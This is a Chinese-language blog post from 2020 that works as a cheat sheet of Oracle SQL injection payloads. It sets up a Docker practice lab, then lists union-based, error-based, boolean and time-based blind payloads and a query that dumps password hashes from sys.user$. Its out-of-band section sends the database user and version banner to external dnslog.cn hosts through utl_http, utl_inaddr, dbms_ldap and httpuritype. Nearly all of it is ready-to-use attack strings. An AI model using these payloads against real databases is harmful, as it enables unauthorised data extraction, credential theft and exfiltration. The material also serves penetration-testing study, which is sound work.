深入学习Oracle数据库注入方式

2020-09-10

Oracle数据库注入方式总结

Oracle介绍

Oracle一种C/S架构的数据库管理系统，Oracle Client由User Process、Server Process和PGA组成，Oracle Server由instance和database组成。

环境搭建

git clone https://github.com/ChaMd5Team/Pentest-tools.git
cd Pentest-tools/Oracleinject
docker build -t oracletest .
docker run --name oracleinject -itd -p 1521:1521 oracletest /bin/bash
docker exec -it oracleinject /bin/bash
source /etc/profile
sqlplus /nolog
conn / as sysdba

知识基础

不同于MySQL的是，Oracle的完整的查询语句一定要有表名，若不知道表名，可使用Oracle的虚表dual。
常用查询语句
此部分参考ChaMd5安全团队Oracle学习文章，侵删

获得数据库版本

1 2	SELECT banner FROM v$version WHERE banner LIKE 'Oracle%'; SELECT version FROM v$instance;

获得OS版本

1	SELECT banner FROM v$version where banner like 'TNS%';

获得当前数据库用户：

1	select user from dual;

获得当前用户权限

1	SELECT * FROM session_privs;

获取所有数据库用户密码

1	SELECT name, spare4 FROM sys.user$;

列出DBA账户

1	select distinct grantee from dba_sys_privs where admin_option ='YES';

获取DB文件路径

1	SELECT name FROM V$DATAFILE;

联合注入

查询表

1 2	union select table_name from user_tables where rownum=1 union select table_name from user_tables where rownum=1 and table_name <> Know_tablename

查询字段

1 2	union select '1',column_name from user_tab_columns where rownum=1 union select '1',column_name from user_tab_columns where table_name <> know_columnname and rownum=1

查询内容

1	union select column_name from table_name

报错注入

utl_inaddr.get_host_name

1	and 1=utl_inaddr.get_host_name((select user from dual))

utl_inaddr.get_host_address()

1	select utl_inaddr.get_host_address('~'\|\|(select user from dual)\|\|'~') from dual;

ctxsys.drithsx.sn()

1	and 1=ctxsys.drithsx.sn(1,(select user from dual))

ctxsys.ctx_report.token_type()

1	select ctxsys.ctx_report.token_type((select user from dual), '1') from dual;

XMLType()

1	and (select upper(XMLType(chr(60)\|\|chr(58)\|\|(select user from dual)\|\|chr(62))) from dual) is not null

dbms_xdb_version.checkin()

1	and (select dbms_xdb_version.checkin((select user from dual)) from dual) is not null

dbms_xdb_version.makeversioned()

1	and (select dbms_xdb_version.makeversioned((select user from dual)) from dual) is not null

dbms_xdb_version.uncheckout()

1	and (select dbms_xdb_version.uncheckout((select user from dual)) from dual) is not null

dbms_utility.sqlid_to_sqlhash()

1	and (SELECT dbms_utility.sqlid_to_sqlhash((select user from dual)) from dual) is not null

ordsys.ord_dicom.getmappingxpath()

1	and 1=ordsys.ord_dicom.getmappingxpath((select user from dual))

带外通信

utl_http.request()，HTTP外带，类似SSRF

1	and 1=utl_http.request('http://www.ehae75.dnslog.cn'\|\|(select banner from sys.v_$version where rownum=1))

utl_inaddr.get_host_address()，DNS外带

1	and (select utl_inaddr.get_host_address((select user from dual)\|\|'.ehae75.dnslog.cn') from dual)is not null

sys.dbms_ldap.init()，DNS外带

1	select dbms_ldap.init('2gwq0x.dnslog.cn',80) from dual;

httpuritype()

1	select httpuritype((select user from dual)\|\|'.xxxxxx.dnslog.cn').getclob() from dual;

盲注

布尔盲注

decode

1	1=(select decode(substr(user,1,1),'S',1,0) from dual)

instr

1	1=(instr((select user from dual),'PENTEST'))

时间盲注

DBMS_PIPE.RECEIVE_MESSAGE

1	1=(select decode(substr(user,1,1),'T',DBMS_PIPE.RECEIVE_MESSAGE('a',3),0) from dual)

总结

简单的写了写常用的注入方式，实际情况估计还要考虑到waf对抗的情况；除此之外，Oracle也涉及到提权等操作，还暂未涉及，包括通过Oracle来执行命令等，后续不断完善此文章吧。

本文作者： yd0ng
本文链接： https://yd0ng.github.io/2020/09/10/%E6%B7%B1%E5%85%A5%E7%90%86%E8%A7%A3Oracle%E6%95%B0%E6%8D%AE%E5%BA%93%E6%B3%A8%E5%85%A5%E6%96%B9%E5%BC%8F/
版权声明： 本作品采用知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议进行许可。转载请注明出处！